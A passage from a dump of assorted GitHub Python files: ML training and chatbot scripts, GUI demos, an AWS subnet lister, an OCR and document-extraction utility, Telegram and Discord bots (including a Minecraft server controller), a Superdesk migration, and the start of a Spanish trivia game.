validate_start_index = 0\n validate_end_index = validate_start_index + batch_size\n valiate_accuracy_value = sess.run(\n [accuracy],\n feed_dict={\n X: X_test[validate_start_index:validate_end_index],\n Y: Y_test[validate_start_index:validate_end_index]\n })\n print(\"Epoch: {}, image id: {}, validate accuracy: {}\".format(\n epoch_index, i, valiate_accuracy_value))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tobegit3hub/tensorflow_examples","sub_path":"resnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"73"} +{"seq_id":"6358642685","text":"from schoenen_data import schoenen_lijst\n\n\n# opdracht 1:\n# Print alle schoenen van het merk Adidas\nfor x in schoenen_lijst:\n if x['merk'] == 'Adidas':\n print(x)\n\n# filteren\n# opdracht 2:\n# Vraag een merk en print vervolgens alle modellen van het merk en de bijbehorende prijs.\nvraag_merk = input(\"Welk merk? Kies uit Adidas, Nike, Puma of Gaastra: \")\nfor x in schoenen_lijst:\n if vraag_merk != '':\n print(x['merk'])\n print(x['model'])\n print(x['prijs'])\n \n \n# opdracht 3:\n# Vraag een merk en print vervolgens alle witte schoenen mits duurder dan €100.\n\n\n# opdracht 4:\n# vraag de maat van de klant en print vervolgens:\n# \"fonetische_kleuren Merknaam Modelnaam, prijs\"\n# uiteraard alleen de schoenen die beschikbaar zijn in betreffende maat.\n\n\n# Opdracht 5 (medium):\n# print van de duurste schoen: merk en model en doe dat ook voor de goedkoopste.\n\n\n# opdracht 6 (hard):\n# print van de schoen leverbaar in de grootste maat :\n# IN maat ... leverbaar: merk. 
model en kleur van de schoenen\n# (let op, filter in: in code)","repo_name":"Seantheman01/Python","sub_path":"extra/challenges/schoenen_opdracht.py","file_name":"schoenen_opdracht.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"7051277336","text":"import boto3\n\ndef subnet(logger,credentials,account,account_name):\n logger.info(f\"{account_name} >> Start Describing {subnet.__name__}...\")\n\n output = []\n\n region_list = [\n \"us-east-1\",\n \"us-east-2\",\n \"us-west-1\",\n \"us-west-2\",\n \"ap-south-1\",\n \"ap-northeast-3\",\n \"ap-northeast-2\",\n \"ap-southeast-1\",\n \"ap-southeast-2\",\n \"ap-northeast-1\",\n \"ca-central-1\",\n \"eu-central-1\",\n \"eu-west-1\",\n \"eu-west-2\",\n \"eu-west-3\",\n \"eu-north-1\",\n \"sa-east-1\"\n ]\n\n for region in region_list:\n\n client = boto3.client(\n 'ec2',\n aws_access_key_id=credentials['AccessKeyId'],\n aws_secret_access_key=credentials['SecretAccessKey'],\n aws_session_token=credentials['SessionToken'],\n region_name = region\n )\n\n response = ''\n next_token = ''\n first_check = True\n\n\n while next_token is not None:\n\n try:\n if first_check:\n response = client.describe_subnets()\n first_check = False\n else:\n response = client.describe_subnets(NextToken=next_token)\n\n for res in response['Subnets']:\n name = ''\n #get name\n if 'Tags' in res:\n for tag in res['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n break\n\n output.append({\n \"ACCOUNT\" : f\"'{account}\",\n \"ACCOUNT_NAME\" : account_name,\n \"Region\" : region,\n \"VpcId\" : res[\"VpcId\"],\n \"SubnetId\" : res[\"SubnetId\"],\n \"Name\" : name,\n \"cidr\" : res[\"CidrBlock\"],\n \"AvailabilityZone\" : res[\"AvailabilityZone\"]\n })\n\n if 'NextToken' in response:\n next_token = response['NextToken']\n else:\n next_token = None\n except Exception as e:\n logger.info(\"Error!!\")\n logger.exception(\"message\")\n \n \n logger.info(f\"{account_name} >> Finish Describing {subnet.__name__}...\")\n return output","repo_name":"sjlee-git/automation","sub_path":"python/boto3/aws_assets/describe_resources/subnet.py","file_name":"subnet.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"71866582955","text":"import tkinter as tk\n\nimport tkinter.messagebox\n\nwindow = tk.Tk()\n\nwindow.title(\"我的第一個GUI程式\")\n\nwindow.geometry('300x300')\n\ndef clickMe():\n tkinter.messagebox.showinfo(title='提示', message= '好累')\n\nlabel = tk.Label(window,text=\"我的GUI\", bg= \"#567\", fg = \"#BFC\")\n\nlabel.pack()\n\nentry = tk.Entry(window, width = 20)\n\nentry.pack()\n\nbutton = tk.Button(window, text = \"按鈕\", command = clickMe)\n\nbutton.pack()\n\nwindow.mainloop()\n","repo_name":"Eason13245/AE403-TKinter-","sub_path":"Class1_Work.py","file_name":"Class1_Work.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39072566736","text":"from PIL import Image\nimport subprocess\nimport pytesseract\nimport cv2\nimport pandas as pd\nimport zipfile\nimport rarfile\nimport os\nimport eml_parser\nimport base64\nimport datetime\nimport json\nimport pathlib\nfrom bs4 import BeautifulSoup\nimport re\nimport urllib.parse\nimport xml.etree.ElementTree as ET\nfrom paddleocr import PaddleOCR, PPStructure\nfrom paddleocr import paddleocr\nimport csv\n\nimport logging\nimport time\n\nocr 
= PaddleOCR(use_angle_cls=True)\ntable_engine = PPStructure(show_log=True)\npaddleocr.logging.disable(logging.DEBUG)\n\n# convert doc file to docx file\ndef convert_doc_to_docx(doc_path):\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'docx', doc_path])\n\n# convert doc file to html file\ndef convert_doc_to_html(doc_path):\n subprocess.run(['libreoffice', '--headless', '--convert-to', 'html', '--convert-images-to', 'jpg', doc_path])\n\n# OCR by Python library\ndef ocr_lib(img_path):\n # image = Image.open(img_path)\n img = cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # # 虚化处理\n # blurMedian = cv2.medianBlur(gray, 3)\t# 中值虚化处理\n # blurGaussian = cv2.GaussianBlur(gray,(5,5),0)\t# 高斯虚化处理\n # otsuThreshold1 = cv2.threshold(blurMedian, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n # thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n # cnts = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n # cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n ocr_text = pytesseract.image_to_string(gray, lang='chi_sim+eng')\n return ocr_text\n\n\n# OCR by API\ndef ocr_api(img_path, csv_path=None):\n result = table_engine(img_path)\n ocr_text = ''\n now_line = 0.0\n for line in result:\n if line['type'] == 'table':\n html = line['res']['html']\n soup = BeautifulSoup(html, 'html.parser')\n # 查找HTML中的表格(假设您只有一个表格)\n table = soup.find('table')\n\n # 如果有多个表格,可以使用find_all来获取所有表格\n\n # 打开CSV文件以写入数据\n if csv_path == None:\n csv_path = '/home/norainy/jingsai/output1/' + str(time.time()) + '.csv'\n with open(csv_path, 'w', newline='', encoding='utf-8') as csv_file:\n csv_writer = csv.writer(csv_file)\n\n # 遍历表格的行和列,将数据写入CSV文件\n for row in table.find_all('tr'):\n csv_row = []\n for cell in row.find_all(['th', 'td']):\n csv_row.append(cell.get_text(strip=True))\n csv_writer.writerow(csv_row)\n return False\n else:\n for i in line['res']:\n if (i['text_region'][0][1] + i['text_region'][3][1])/2 > now_line:\n now_line = i['text_region'][3][1]\n ocr_text += '\\n' + i['text']\n else:\n ocr_text += ' ' + i['text']\n # ocr_text += i['text'] \n return ocr_text\n # img = cv2.imread(img_path)\n # gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # blurred_image = cv2.GaussianBlur(gray, (5, 5), 0)\n # result = ocr.ocr(img_path)\n # now_line = 0.0\n # ocr_text = ''\n # for idx in range(len(result)):\n # # ocr_text += result[idx][1][0]\n # res = result[idx]\n # # print(res)\n # # print(res[0][0][1])\n # if (res[0][0][1] + res[0][3][1])/2 > now_line:\n # now_line = res[0][3][1]\n # ocr_text += '\\n' + res[1][0]\n # else:\n # ocr_text += ' ' + res[1][0]\n # return ocr_text\n\ndef excel_to_json(excel_file_path):\n # 使用pandas读取Excel文件的所有工作表\n sheets = pd.read_excel(excel_file_path, sheet_name=None)\n # 创建一个字典,用于存储每个工作表的JSON数据\n json_data = {}\n # 遍历每个工作表,并将其转换为JSON格式\n for sheet_name, df in sheets.items():\n # 将DataFrame转换为JSON格式\n json_data[sheet_name] = df.to_json(orient='records', lines=True, force_ascii=False)\n return json_data\n\ndef excel_to_csv(excel_file_path, root_path):\n if not os.path.exists(root_path):\n os.mkdir(root_path)\n # 读取 Excel 文件\n xls_file = pd.ExcelFile(excel_file_path)\n\n # 获取 Excel 文件中的工作表列表\n sheet_names = xls_file.sheet_names\n # print(sheet_names)\n # 遍历每个工作表并将其保存为 CSV 文件\n for sheet_name in sheet_names:\n # 从 Excel 文件中读取工作表数据\n df = xls_file.parse(sheet_name)\n \n # 将工作表数据保存为 CSV 文件\n csv_filename = f'{root_path}/{sheet_name}.csv'\n df.to_csv(csv_filename, index=False, encoding='utf-8')\n\n\n# 解压压缩包\ndef 
unzip_remove(zip_file_path, extract_to_path):\n with zipfile.ZipFile(zip_file_path, 'r') as zip_ref:\n zip_ref.extractall(extract_to_path)\n os.remove(zip_file_path)\n return \n\n# unzip rar file\ndef unrar(rar_file, output_dir):\n \"\"\"Unzips a rar file to the specified output directory.\n\n Args:\n rar_file: The rar file to unzip.\n output_dir: The output directory to unzip the rar file to.\n \"\"\"\n\n try:\n with rarfile.RarFile(rar_file) as rf:\n rf.extractall(output_dir)\n print(\"RAR file extraction successful.\")\n except Exception as e:\n print(f\"Error while extracting RAR file: {e}\")\n\n# 处理eml文件\ndef process_eml(eml_file_path, file_dir_path):\n ep = eml_parser.EmlParser(include_raw_body=True, include_attachment_data=True)\n parsed_eml = ep.decode_email(eml_file_path)\n eml_text = ''\n # print(ep.get_raw_body_text(eml_file_path))\n # out_path = pathlib.Path(eml_file_path[:eml_file_path.rfind('/') + 1])\n if not os.path.exists(file_dir_path):\n os.mkdir(file_dir_path)\n out_path = pathlib.Path(file_dir_path)\n \n if 'attachment' in parsed_eml:\n for a in parsed_eml['attachment']:\n out_filepath = out_path / a['filename']\n\n print(f'\\tWriting attachment: {out_filepath}')\n with out_filepath.open('wb') as a_out:\n a_out.write(base64.b64decode(a['raw']))\n \n # print(parsed_eml)\n for i in ['subject', 'from', 'to']:\n eml_text += i + ': ' + str(parsed_eml['header'][i]) + '\\n'\n for b in parsed_eml['body']:\n # print('--------------')\n # print(b)\n for i in ['email', 'domain', 'ip']:\n eml_text += i + ': ' + str(b[i]) + '\\n'\n soup = BeautifulSoup(b['content'], 'html.parser')\n eml_text += soup.get_text(separator=\" \", strip=True)\n # print(soup.get_text(separator=' ', strip=True))\n # res1=re.findall(r\"]*>(.*?)
|]*>(.*?)\", str(b['content']))\n # res1 = b['content']\n # for r in res1:\n # eml_text += r[0]+r[1]+'\\n'\n # print(parsed_eml['body'][1]) # attachment body header\n # print(parsed_eml) # attachment body header\n \n\n # print(parsed_eml['attachment'])\n # return json.dumps(parsed_eml, default=json_serial, ensure_ascii=False)\n return eml_text\n\ndef json_serial(obj):\n if isinstance(obj, datetime.datetime):\n serial = obj.isoformat()\n return serial\n \n# 生成txt文件\ndef generate_txt(file, content):\n with open(file, 'w') as f:\n f.write(content)\n \n# 处理html文件\ndef html_to_txt(html_dir, html_name):\n html_path = os.path.join(html_dir, html_name)\n # 读取HTML文件内容\n with open(html_path, \"r\", encoding=\"utf-8\") as f:\n html_content = f.read()\n\n # 使用Beautiful Soup解析HTML\n soup = BeautifulSoup(html_content, \"html.parser\")\n text = \"\"\n # 遍历HTML文档节点\n for element in soup.descendants:\n # 提取文本内容\n if isinstance(element, str) and 'page' not in element.strip():\n text = text + element.strip()\n # print(element.strip())\n # 提取图片名称\n elif element.name == \"img\":\n src = element.get(\"src\")\n src = urllib.parse.unquote(src)\n # print(\"src: \", src)\n # img_name = re.search(r'/([^/]+)$', src)\n # if img_name:\n # print(\"Image Name:\", img_name.group(1))\n img_path = os.path.join(html_dir, src)\n image_txt = ocr_api(img_path)\n if image_txt != False:\n # text = text + '\\n From image:\\n' + image_txt\n text = text + image_txt\n return text\n\n\ndef sort_by_number(filename):\n # 使用正则表达式提取文件名中的数字部分\n match = re.search(r'\\d+', filename)\n if match:\n return int(match.group())\n else:\n return filename\n\n\n\n# 处理html文件\ndef pptx_to_txt(pptx_path, pptx_dir):\n os.rename(pptx_path, pptx_dir+'.zip')\n unzip_remove(pptx_dir+'.zip', pptx_dir)\n text = ''\n img_dir = os.path.join(pptx_dir, 'ppt', 'media')\n slide_dir = os.path.join(pptx_dir, 'ppt', 'slides')\n for root, dirs, files in os.walk(slide_dir):\n # files = sorted(files, key=sort_by_number) # 对文件排序\n for file in files:\n file_path = os.path.join(root, file)\n with open(file_path) as f:\n # pass\n xml_root = ET.parse(f).getroot()\n for elem in xml_root.iter():\n namespace, element_name = elem.tag.split(\"}\", 1)\n # print(element_name)\n if element_name == 't':\n # print(ET.tostring(elem, encoding='unicode'))\n content = elem.text\n text += content\n for root, dirs, files in os.walk(img_dir):\n for file in files:\n file_path = os.path.join(root, file)\n extension = file_path.split('.')[-1]\n # print(file_path)\n if extension in ['jpg', 'jpeg', 'png']:\n t = ocr_api(file_path)\n if t != False:\n text += t\n return text\n\n\n\nif __name__ == \"__main__\":\n start = time.time()\n text = ocr_api('/home/norainy/jingsai/赛题材料/麒麟SSL+VPN+Windows客户端使用手册_html_98bf9c15f498bb9a.png')\n # print(text)\n # text = process_eml('/home/norainy/jingsai/题目1:富文本敏感信息泄露检测/赛题材料/xxx部门弱口令漏洞问题和整改 2023-05-25T17_27_32+08_00.eml')\n # print(text)\n # text = excel_to_csv('/home/norainy/jingsai/赛题材料/wps/资产梳理.et', '/home/norainy/jingsai/赛题材料/wps')\n print(text)\n end = time.time()\n print(end-start)","repo_name":"hjdongcn/rich_text_extract","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41444845452","text":"import torch\nfrom transformers import AutoTokenizer, AutoModel\n\n# Load the model and tokenizer\nmodel = AutoModel.from_pretrained(\"distilbert-base-cased-distilled-squad\", from_tf=True)\ntokenizer = 
AutoTokenizer.from_pretrained(\"distilbert-base-cased-distilled-squad\", from_tf=True)\n\ndef chatbot_response(question):\n # Encode the input text\n input_ids = torch.tensor([tokenizer.encode(question, add_special_tokens=True)])\n \n # Get the model's prediction\n with torch.no_grad():\n outputs = model(input_ids)\n answer_start_scores, answer_end_scores = outputs[:2]\n \n # Get the best answer\n answer_start = torch.argmax(answer_start_scores)\n answer_end = torch.argmax(answer_end_scores) + 1\n answer = tokenizer.decode(input_ids[0][answer_start:answer_end])\n \n return answer\n\n# Test the chatbot\nquestion = input(\"Ask your question. Ex: What is the return policy for your products? :\")\nprint(\"Question:\", question)\nprint(\"Answer:\", chatbot_response(question))\n","repo_name":"shamspias/basic_nlu_chatbot","sub_path":"chatbot_distilbert-base-cased-distilled-squad.py","file_name":"chatbot_distilbert-base-cased-distilled-squad.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"34330796133","text":"import PyQt5.QtWidgets as qtw\nimport PyQt5.QtGui as qtg\n\nclass MainWindow(qtw.QWidget):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\t# Add a title\n\t\tself.setWindowTitle(\"Hello World!!\")\n\n\t\t# Set Vertical layout\n\t\tself.setLayout(qtw.QVBoxLayout())\n\n\t\t# Create A Label\n\t\tmy_label = qtw.QLabel(\"Type Something Into The Box Below\", self)\n\t\t# Change the font size of label\n\t\tmy_label.setFont(qtg.QFont('Helvetica', 24))\n\t\tself.layout().addWidget(my_label)\n\n\t\t# Create an Text box\n\t\tmy_text = qtw.QTextEdit(self,\n\t\t\tplainText=\"This is real text!\",\n\t\t\t#html = \"
Big Header Text!
\",\n\t\t\tacceptRichText= False,\n\t\t\tlineWrapMode=qtw.QTextEdit.FixedColumnWidth,\n\t\t\tlineWrapColumnOrWidth=75,\n\t\t\tplaceholderText=\"Hello World!\",\n\t\t\treadOnly=True,\n\t\t\t)\n\t\t# Change font size of spinbox\n\t\t#my_spin.setFont(qtg.QFont('Helvetica', 18))\n\t\t\n\n\t\t# Put combobox on the screen\n\t\tself.layout().addWidget(my_text)\n\n\t\t# Create a button\n\t\tmy_button = qtw.QPushButton(\"Press Me!\", \n\t\t\tclicked = lambda: press_it())\n\t\tself.layout().addWidget(my_button)\n\n\t\t# Show the app\n\t\tself.show()\n\n\t\tdef press_it():\n\t\t\t# Add name to label\n\t\t\tmy_label.setText(f'You Typed {my_text.toPlainText()}!')\n\t\t\tmy_text.setPlainText(\"You Pressed The Button!\")\n\napp = qtw.QApplication([])\nmw = MainWindow()\n\n# Run The App\napp.exec_()","repo_name":"flatplanet/pyqt5_youtube_playlist","sub_path":"textbox.py","file_name":"textbox.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"73"} +{"seq_id":"28376163631","text":"import datetime\n\nfrom aiogram import types\nfrom aiogram.dispatcher.filters.builtin import CommandStart\nfrom aiogram.types import CallbackQuery, KeyboardButton, ReplyKeyboardMarkup,InlineKeyboardButton,InlineKeyboardMarkup\n\nfrom keyboards.default.menu_uchun import menu_button\nfrom keyboards.default.milliy_taom import taom_button\n\nfrom keyboards.inline.tillar_uchun import till_button\n\n\nfrom loader import dp, base, bot\n\n\n#Menu\n# azolarni qabul qilish\n@dp.message_handler(CommandStart())\nasync def bot_start(message: types.Message):\n ism = message.from_user.first_name\n fam = message.from_user.last_name\n user_id = message.from_user.id\n try:\n base.user_qoshish(ism=ism,fam=fam,username=message.from_user.username,tg_id=user_id)\n except Exception:\n pass\n await message.answer(f\"Salom, Tillarni tanlang {message.from_user.full_name}!\",reply_markup=till_button)\n\n# tillar uchun\n@dp.callback_query_handler(text=\"til1\")\nasync def bot_start(xabar: CallbackQuery):\n await xabar.message.answer(f\"Taomlarni tanlang \",reply_markup=menu_button)\n\n\n\n\n#Taomlar bo'limi buttonlar\nmenular = base.select_all_menu()\n@dp.message_handler(text=[menu[1] for menu in menular])\nasync def bot_start(message: types.Message):\n typee =message.text\n maxsulotlar = base.select_maxsulotlar(turi=typee)\n\n index = 0\n i = 0\n royxat = []\n for menu in maxsulotlar:\n if i % 2 == 0 and i != 0:\n index += 1\n if i % 2 == 0:\n royxat.append([KeyboardButton(text=menu[1])])\n else:\n royxat[index].append(KeyboardButton(text=menu[1]))\n i += 1\n\n royxat.append([KeyboardButton(text=\"Orqaga\")])\n maxsulotlar_buttun = ReplyKeyboardMarkup(keyboard=royxat, resize_keyboard=True)\n\n await message.answer(f\"Maxsulotlarni tanlang, {message.from_user.full_name}!\",reply_markup=maxsulotlar_buttun)\n\n#maxsulotlar\nmenular = base.select_all_maxsulotlar()\n@dp.message_handler(text=[menu[1] for menu in menular])\nasync def bot_start(message: types.Message):\n typee = message.text\n maxsulot = base.select_maxsulotlar(nomi=typee)[0]\n print(maxsulot,'++++++++++++++++++++++')\n #print(maxsulot)\n #(1, 'Osh', 20000, 'https://t.me/meningkanalim1898/2', None, 'Taomlar')\n max_id = maxsulot[0]\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[5]\n max_rasmi = maxsulot[2]\n user_id = message.from_user.id\n await bot.send_photo(chat_id=user_id,photo=max_rasmi,caption=f\"Nomi :{max_nomi}\\n\"\n f\"Narxi : {max_narxi}\",\n reply_markup=InlineKeyboardMarkup(inline_keyboard=[\n 
[\n InlineKeyboardButton(text=\"Sotib olish\",callback_data=f\"buy {max_id}\")\n ]\n ]\n )\n\n )\n\n#orqaga\n@dp.message_handler(text=\"Orqaga\")\nasync def bot_start(message: types.Message):\n await message.answer(f\"Taomlarni tanlang, {message.from_user.full_name}!\", reply_markup=menu_button)\n\n\n\n@dp.callback_query_handler()\nasync def bot_start(xabar: CallbackQuery):\n data = xabar.data.split()\n if data[0] == 'buy':\n maxsulot_id = data[1]\n maxsulot=base.select_maxsulot(id=maxsulot_id)\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[5]\n max_rasmi = maxsulot[2]\n max_malumot = maxsulot[3]\n max_turi = maxsulot[4]\n max_soni = 1\n user_id = xabar.from_user.id\n user_name=xabar.from_user.username\n date = datetime.datetime.now()\n korzinka = base.select_maxsulot_from_korzinka(nomi=max_nomi,tg_id=user_id)\n print(korzinka)\n if korzinka:\n max_soni = korzinka.soni+1\n base.maxsulot_qoshish_to_korzinka(nomi=max_nomi,tg_id=user_id,narxi=max_narxi,rasm=max_rasmi,turi=max_turi,soni=max_soni,malumot=max_malumot,username=user_name,date=date,status=True)\n\n await xabar.message.answer(f\"Maxsulot Korzinkaga joylandi ! \")\n\n@dp.message_handler(text=\"Korzinka\")\nasync def bot_start (message: types.Message):\n user_id = message.from_user.id\n user_maxsulotlar = base.select_maxsulotlar_from_korzinka(tg_id=user_id)\n\n for maxsulot in user_maxsulotlar:\n # 1, 'Osh', 20000, 'https://t.me/media_uchun596/16', 'Toshkent Oshi', 'Milliy taomlar', 1, 6206058862, '2023-06-05 13:51:23.593051', 1, 'Dobry_one'\n max_id = maxsulot[0]\n max_nomi = maxsulot[1]\n max_narxi = maxsulot[2]\n max_rasmi = maxsulot[3]\n max_soni = maxsulot[6]\n user_id = message.from_user.id\n await bot.send_photo(chat_id=user_id, photo=max_rasmi, caption=f\"Nomi :{max_nomi}\\n\"\n f\"Narxi : {max_narxi}\",\n reply_markup=InlineKeyboardMarkup(inline_keyboard=[\n [\n InlineKeyboardButton(text=\"-\", callback_data=f\"min {max_id}\"),\n InlineKeyboardButton(text=f\"{max_soni}\", callback_data=f\"number {max_id}\"),\n InlineKeyboardButton(text=\"+\", callback_data=f\"plus {max_id}\"),\n\n\n ]\n ]\n )\n\n )\n\n await message.answer(f\"Birinchi taomni tanlang, {message.from_user.full_name}!\", reply_markup=taom_button)\n","repo_name":"dobry61/.gitignore","sub_path":"handlers/users/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":5465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12189128982","text":"from superdesk.commands.data_updates import DataUpdate as Update\nfrom superdesk import get_resource_service\n\nSINGLE = 'single selection'\nMULTI = 'multi selection'\nNONE = 'do not show'\n\nselection_map = {\n 'genre': SINGLE,\n 'urgency': SINGLE,\n 'locators': SINGLE,\n 'priority': SINGLE,\n 'footers': SINGLE,\n\n 'iptc_category_map': MULTI,\n 'keywords': MULTI,\n 'categories': MULTI,\n 'default_categories': MULTI,\n 'company_codes': MULTI,\n\n 'desk_types': NONE,\n 'subscriber_types': NONE,\n 'crop_sizes': NONE,\n 'type': NONE,\n 'signal': NONE,\n 'replace_words': NONE,\n 'product_types': NONE,\n 'bom_products': NONE,\n 'contact_job_titles': NONE,\n 'contact_mobile_usage': NONE,\n 'contact_phone_usage': NONE,\n 'annotation_types': NONE,\n 'g2_content_type': NONE,\n 'geographical_restrictions': NONE,\n 'rightsinfo': NONE,\n 'assignment_priority': NONE,\n 'regions': NONE,\n 'countries': NONE,\n 'coverage_providers': NONE,\n 'eventoccurstatus': NONE,\n 'newscoveragestatus': NONE,\n 'event_calendars': NONE\n}\n\n\nclass DataUpdate(Update):\n\n resource = 
'vocabularies'\n\n def forwards(self, mongodb_collection, mongodb_database):\n vocabularies_service = get_resource_service('vocabularies')\n for vocabulary in vocabularies_service.get(req=None, lookup=None):\n vocab_id = vocabulary['_id']\n\n mongodb_collection.update({'_id': vocab_id}, {\n '$set': {'selection_type': selection_map.get(vocab_id) or MULTI},\n '$unset': {'single_value': 1}\n })\n\n def backwards(self, mongodb_collection, mongodb_database):\n vocabularies_service = get_resource_service('vocabularies')\n for vocabulary in vocabularies_service.get(req=None, lookup=None):\n single_value = vocabulary.get('selection_type') == 'single selection'\n mongodb_collection.update({'_id': vocabulary['_id']}, {\n '$set': {'single_value': single_value},\n '$unset': {'selection_type': 1}\n })\n","repo_name":"superdesk/superdesk-aap","sub_path":"server/data_updates/00017_20190123-110800_vocabularies.py","file_name":"00017_20190123-110800_vocabularies.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"73"} +{"seq_id":"6670771527","text":"from discord.ext.commands import Cog\nfrom discord.ext.commands import command\nfrom apscheduler.triggers.cron import CronTrigger\nfrom datetime import datetime\n\nimport pexpect\nimport re\n\nfrom ..db import db\n\nserver_status = 0\nansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\nskip_one_cron_cycle = False\n\n\nclass MC(Cog):\n def __init__(self, bot):\n self.bot = bot\n bot.scheduler.add_job(self.check_status, CronTrigger(minute='0,15,30,45'))\n\n global server_status\n try:\n status = (pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')).decode()\n p = re.compile(\"Connection failed\")\n if p.match(status): #Server is not live\n server_status = 0\n else:\n server_status = 1\n except:\n pass\n\n\n async def check_status(self):\n global server_status\n global skip_one_cron_cycle\n if server_status == 0 or skip_one_cron_cycle == True:\n skip_one_cron_cycle = False\n return\n else:\n players = pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')\n players = players.decode()\n p = re.compile(\"There are (\\d+) of\")\n m = p.match(players)\n online_players = m.group(1)\n if online_players == \"0\": #No one is online, shutdown server\n pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"say Server is stopping due to inactivity\" save-all stop')\n server_status = 0\n\n @command(name=\"mcstart\")\n async def mcstart(self, ctx):\n global server_status\n global skip_one_cron_cycle\n if server_status == 0:\n try:\n await ctx.send(\"Starting mc server\")\n child = pexpect.spawn('sh')\n child.expect([pexpect.TIMEOUT,'#'])\n\n child.sendline('screen -r')\n child.expect([pexpect.TIMEOUT, '#'])\n\n child.sendline('cd /home/nkeep/minecraft/minecraft_1_19_paper/')\n child.expect([pexpect.TIMEOUT, '#'])\n\n child.sendline('bash start.sh')\n child.expect('Done', timeout = 60)\n\n server_status = 1\n child.sendline('\\001d')\n child.terminate()\n\n skip_one_cron_cycle = True\n await ctx.send(\"mc server started\")\n except:\n await ctx.send(\"Failed to start server\")\n else:\n await ctx.send(\"Sever already running\")\n\n @command(name=\"mclist\")\n async def mclist(self, ctx):\n global server_status\n if server_status == 1:\n try:\n players = pexpect.run('/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"list\"')\n players = players.decode()\n p = re.compile(\"There are (\\d+) 
of.*online: (.*)\")\n m = p.match(players)\n num_players = m.group(1)\n online_players = m.group(2)\n online_players = ansi_escape.sub('',online_players)\n if num_players == \"0\": \n await ctx.send(\"No players online\")\n else:\n await ctx.send(num_players + \" Players online: \" + online_players)\n except:\n await ctx.send(\"Failed to get list\")\n else:\n await ctx.send(\"Server must be running to use this command. Use mcstart to start server\")\n\n @command(name=\"mcweatherclear\", aliases=[\"mcwc\", \"mctoggledownfall\"])\n async def mcweatherclear(self, ctx):\n await mc_command(ctx, \"weather clear\")\n await ctx.send(\"Cleared weather\")\n\n @command(name=\"mctimeset0\", aliases=[\"mcts0\", \"mctimesetday\", \"mctsd\"])\n async def mctimeset0(self, ctx):\n await mc_command(ctx, \"time set 0\")\n await ctx.send(\"Set time to 0\")\n\n @command(name=\"mccommand\", aliases=[\"mc\"], hidden=True)\n async def mccommand(self, ctx, *, command):\n if ctx.author.id == 143919895694802944:\n await mc_command(ctx, command)\n await ctx.send(\"Success\")\n\n @Cog.listener()\n async def on_ready(self):\n if not self.bot.ready:\n self.bot.cogs_ready.ready_up(\"mc\")\n\nasync def setup(bot):\n\tawait bot.add_cog(MC(bot))\n\nasync def mc_command(ctx, command):\n global server_status\n if server_status == 1:\n try:\n pexpect.run(f'/home/nkeep/mcrcon/mcrcon -H 0.0.0.0 -p bananabread -w 5 \"{command}\"')\n except:\n await ctx.send(\"Failed to send command\")\n else:\n await ctx.send(\"Server must be running to use this command. Use mcstart to start server\")","repo_name":"nkeep/Discord_Bot_NatP_Public","sub_path":"lib/cogs/mc.py","file_name":"mc.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42130483338","text":"BLACK = '\\033[30m'\nRED = '\\033[31m'\nGREEN = '\\033[32m'\nYELLOW = '\\033[33m'\nBLUE = '\\033[34m'\nMAGENTA = '\\033[35m'\nCYAN = '\\033[36m'\nWHITE = '\\033[37m'\nRESET = '\\033[39m'\n\nimport random # librería random para el Comodin\nimport time # Importamos la librería time\ncomodin = random.randint(2, 4)\npuntaje = 0\n\niniciar_trivia = True #Variable en True\nintentos = 0 # numero de veces que el usuario intenta la trivia.\n\n# texto de bienvenida\nprint(BLUE+\"Bienvenid@ a mi trivia sobre Inteligencia Artificial\")\nprint(\"Pondré a prueba tus conocimientos con estas 5 preguntas\")\nnombre = input(\"Ingresa tu nombre: \"+RESET)\n\nwhile iniciar_trivia == True:\n\n # Mientras iniciar_trivia:\n intentos += 1\n puntaje = 0\n\n print(GREEN+\"\\nIntento número:\", intentos)\n print(\n \"\\nHola\", nombre,\n \"cada pregunta tendra un valor de 4 puntos + comodin con multiplicador.\\n\"\n )\n print(\n \"Responde las 